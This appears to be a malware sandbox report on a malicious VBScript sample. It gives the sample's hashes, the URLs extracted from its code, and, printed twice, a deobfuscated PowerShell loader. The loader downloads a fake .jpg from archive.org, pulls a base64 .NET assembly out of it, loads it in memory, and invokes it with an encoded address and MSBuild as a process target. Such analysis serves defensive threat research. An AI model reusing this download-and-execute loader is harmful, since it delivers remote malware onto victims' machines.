Malicious

744880276f0cac93094e754f0130534a

VBScript
|
MD5: 744880276f0cac93094e754f0130534a
|
Size: 60.56 KB
|
text/vbscript

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	744880276f0cac93094e754f0130534a
Sha1	6c995aa59e267143b11e9bbf4d6bd19930bc41cb
Sha256	58f594c518e9fdb8834536ca003f068ef18cd17dfa7638651631f22713fa9041
Sha384	26271fd6a03e38ba6fef6c74e888c29ba92b55e377812f7fef0f7fe84efbc21187991bdc2c1971cc935b76d28dae5986
Sha512	afd78b215e3d3ec177484249ae7f2b23f77ce18c41f73e51eea3574966618a72ad2e1b49f9afa9ec2eb8aa53c3a6eb74f5d8c037bd6c1a4dd9b1d0ac1162d5e1
SSDeep	384:/GF8Z/7p8QndpwqjLD5zt/RXpUypuH/bl32zPGEyMjj64ksm7YMI0t6hpbmmnO:p/5zt/RXpY
TLSH	2A433EC4B545774177F0394AC20C2F7CB6EA86046686753A6CBF2BDE86337D92087A9C

File Structure

Artefacts

Name0	Value
URLs in VB Code - #1	https://www.javascriptfreecode.com
URLs in VB Code - #2	https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css
URLs in VB Code - #3	https://fonts.googleapis.com
URLs in VB Code - #4	https://fonts.gstatic.com
URLs in VB Code - #5	https://fonts.googleapis.com/css2?family=Inter:wght@400
URLs in VB Code - #6	https://api.javascripttutorial.net/v1/quotes/?limit=
Deobfuscated PowerShell	$null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://archive.org/download/msi-pro/MSI_PRO.jpg" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05SO1EjN5YTOiFmNxQzY4cDO5YmZ0UjMhVGOjRjYyMDOy81b2lWdxJXYv02bj5yZvxmYvR3clZ3bs5SYxADMwkzLvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "", "MSBuild", "", "", "", "", "C:\Users\Public\Downloads", "threepences", "", "", "", "replating", "2", "") } ))

744880276f0cac93094e754f0130534a (60.56 KB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
URLs in VB Code - #1	https://www.javascriptfreecode.com	744880276f0cac93094e754f0130534a
URLs in VB Code - #2	https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css	744880276f0cac93094e754f0130534a
URLs in VB Code - #3	https://fonts.googleapis.com	744880276f0cac93094e754f0130534a
URLs in VB Code - #4	https://fonts.gstatic.com	744880276f0cac93094e754f0130534a
URLs in VB Code - #5	https://fonts.googleapis.com/css2?family=Inter:wght@400	744880276f0cac93094e754f0130534a
URLs in VB Code - #6	https://api.javascripttutorial.net/v1/quotes/?limit=	744880276f0cac93094e754f0130534a
Deobfuscated PowerShell	$null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://archive.org/download/msi-pro/MSI_PRO.jpg" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05SO1EjN5YTOiFmNxQzY4cDO5YmZ0UjMhVGOjRjYyMDOy81b2lWdxJXYv02bj5yZvxmYvR3clZ3bs5SYxADMwkzLvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "", "MSBuild", "", "", "", "", "C:\Users\Public\Downloads", "threepences", "", "", "", "replating", "2", "") } )) Malicious	744880276f0cac93094e754f0130534a > 744880276f0cac93094e754f0130534a.deobfuscated.vbs > [Command #0] > [Base64-Block]

You must be signed in to post a comment.

An error has occurred. This application may no longer respond until reloaded. Reload 🗙